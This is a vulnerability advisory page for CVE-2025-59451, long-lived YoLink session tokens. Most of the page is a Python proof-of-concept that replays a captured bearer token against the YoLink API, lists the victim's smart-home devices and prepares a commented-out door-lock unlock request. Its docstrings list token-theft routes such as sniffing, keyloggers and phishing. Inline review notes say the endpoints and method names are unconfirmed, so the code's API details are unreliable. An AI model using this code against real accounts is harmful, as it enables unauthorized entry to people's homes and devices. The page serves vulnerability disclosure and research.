Security Vulnerability Report
CVE-2025-59451 CVSS 3.5 LOW

CVE-2025-59451

Published: 2025-10-06 20:15:37
Last Modified: 2026-04-15 00:35:42

Description

The YoSmart YoLink application through 2025-10-02 has session tokens with unexpectedly long lifetimes.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YoSmart YoLink application <= 2025-10-02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
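# CVE-2025-59451 PoC - YoSmart YoLink Session Token Long Lifetime
# This PoC demonstrates how an attacker can exploit the long-lived session token
# to maintain unauthorized access to a YoLink account.
#
# NOTE(review): the endpoint path, HTTP verbs, method names and parameters used
# below are not confirmed by the advisory text on this page. Treat them as
# assumptions and check them against the vendor's API documentation before
# drawing any conclusion from a run.

import requests
import time
import json

# Upper bound, in seconds, on every HTTP call so that an unresponsive endpoint
# cannot hang the check indefinitely.
_REQUEST_TIMEOUT_S = 10


def _redact(token):
    """Return a short, non-reusable description of *token* for console output.

    Only the first four characters and the length are shown, so the output
    can be pasted into a ticket or report without leaking the credential.
    """
    return f"{token[:4]}... ({len(token)} chars)"


class YoLinkSessionExploit:
    """
    PoC for CVE-2025-59451: YoSmart YoLink Session Token Long Lifetime Vulnerability

    The vulnerability exists because YoLink application issues session tokens
    with unexpectedly long lifetimes, allowing attackers to maintain unauthorized
    access for extended periods after token compromise.

    What this class measures is whether a token that was issued earlier is
    still accepted by the server. The matching server-side property is a
    bounded token lifetime together with revocation on logout or credential
    change; a token accepted long after issuance is the finding.
    """

    def __init__(self, target_url="https://api.yosmart.com"):
        self.target_url = target_url
        self.session = requests.Session()
        self.captured_token = None
        self.token_acquired_time = None

    def _auth_headers(self):
        """Build the request headers that carry the recorded bearer token."""
        return {
            "Authorization": f"Bearer {self.captured_token}",
            "Content-Type": "application/json",
        }

    def simulate_token_capture(self, token):
        """
        Simulate capturing a session token through various attack vectors:
        - Network sniffing (MITM)
        - Malware/keylogger
        - Browser storage theft
        - Phishing

        The method only records *token* and the current time; nothing is
        captured from the network. The recorded time is when this script was
        handed the token, not when the server issued it.
        """
        self.captured_token = token
        self.token_acquired_time = time.time()
        # Never echo a usable slice of a bearer token to the console or logs.
        print(f"[+] Session token captured: {_redact(token)}")
        print(f"[+] Capture time: {time.ctime(self.token_acquired_time)}")

    def check_token_validity(self):
        """
        Check if the captured token is still valid after extended period.
        In vulnerable versions, the token remains valid for an unusually long time.

        Returns:
            True when the server answers HTTP 200 to a request that carries the
            token, False when no token is recorded, the request fails, or any
            other status is returned.
        """
        if not self.captured_token:
            print("[-] No token captured")
            return False

        # Attempt to access user account info with captured token
        try:
            response = self.session.get(
                f"{self.target_url}/open/yolink/v2/api",
                headers=self._auth_headers(),
                params={"method": "Home.getDeviceList"},
                timeout=_REQUEST_TIMEOUT_S,
            )
        except requests.RequestException as e:
            # Transport-level failure: says nothing about the token itself.
            print(f"[-] Error: {e}")
            return False

        # Elapsed time counts from when the script recorded the token, so it is
        # only a lower bound on the token's real age. A token assigned directly
        # to the attribute has no recorded time; report 0 days in that case.
        started = self.token_acquired_time
        elapsed_days = 0.0 if started is None else (time.time() - started) / 86400

        # NOTE(review): HTTP 200 alone may not prove the token was accepted.
        # JSON APIs can report an authentication failure inside a 200 body;
        # confirm against the documented response schema before recording a
        # positive result.
        if response.status_code == 200:
            print(f"[+] Token STILL VALID after {elapsed_days:.2f} days!")
            print(f"[+] Response: {response.text[:200]}")
            return True

        print(f"[-] Token expired after {elapsed_days:.2f} days")
        return False

    def exploit_smart_home(self):
        """
        Once token is validated, exploit access to control smart home devices.

        As written, the only request sent is the read-only device listing; the
        state-changing call below is left commented out.
        """
        if not self.check_token_validity():
            return

        headers = self._auth_headers()

        # Example: List all smart devices under victim's account
        payload = {
            "method": "Home.getDeviceList",
            "params": {}
        }

        try:
            response = self.session.post(
                f"{self.target_url}/open/yolink/v2/api",
                headers=headers,
                json=payload,
                timeout=_REQUEST_TIMEOUT_S,
            )
            devices = response.json()
        except (requests.RequestException, ValueError) as e:
            # ValueError covers a body that is not JSON (for example an HTML
            # error page), which the original let propagate as a traceback.
            print(f"[-] Error: {e}")
            return

        print(f"[+] Compromised devices: {devices}")

        # Example: Control a smart lock (dangerous!)
        # NOTE(review): the method name and parameters in this payload are not
        # confirmed anywhere on this page.
        unlock_payload = {
            "method": "DoorLock.unlock",
            "params": {
                "deviceId": "TARGET_DEVICE_ID",
                "duration": 30
            }
        }

        # Uncomment to actually unlock (for authorized testing only!)
        # response = self.session.post(
        #     f"{self.target_url}/open/yolink/v2/api",
        #     headers=headers,
        #     json=unlock_payload
        # )

    def run_poc(self, captured_token):
        """Main PoC execution"""
        print("=" * 60)
        print("CVE-2025-59451 - YoSmart YoLink Session Token Exploit")
        print("=" * 60)

        # Step 1: Capture token (simulated)
        self.simulate_token_capture(captured_token)

        # Step 2: Wait and check validity (demonstrating long lifetime)
        # Three checks two seconds apart show only that the token is accepted
        # now. Evidence of a long lifetime needs the same token re-checked
        # after the interval of interest has really passed.
        print("\n[*] Checking token validity over extended period...")
        for i in range(3):
            print(f"\n--- Check {i+1} ---")
            self.check_token_validity()
            time.sleep(2)  # In real scenario, this could be days/weeks

        # Step 3: Exploit
        print("\n[*] Attempting smart home exploitation...")
        self.exploit_smart_home()


if __name__ == "__main__":
    # Example usage with a captured token (for authorized testing only)
    exploit = YoLinkSessionExploit()

    # Replace with actual captured token for testing
    # exploit.run_poc("captured_session_token_here")
    print("[*] PoC ready. Use exploit.run_poc(token) with authorized token.")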

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59451", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.763", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink application through 2025-10-02 has session tokens with unexpectedly long lifetimes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/sa-2025-001", "source": "[email protected]"}]}}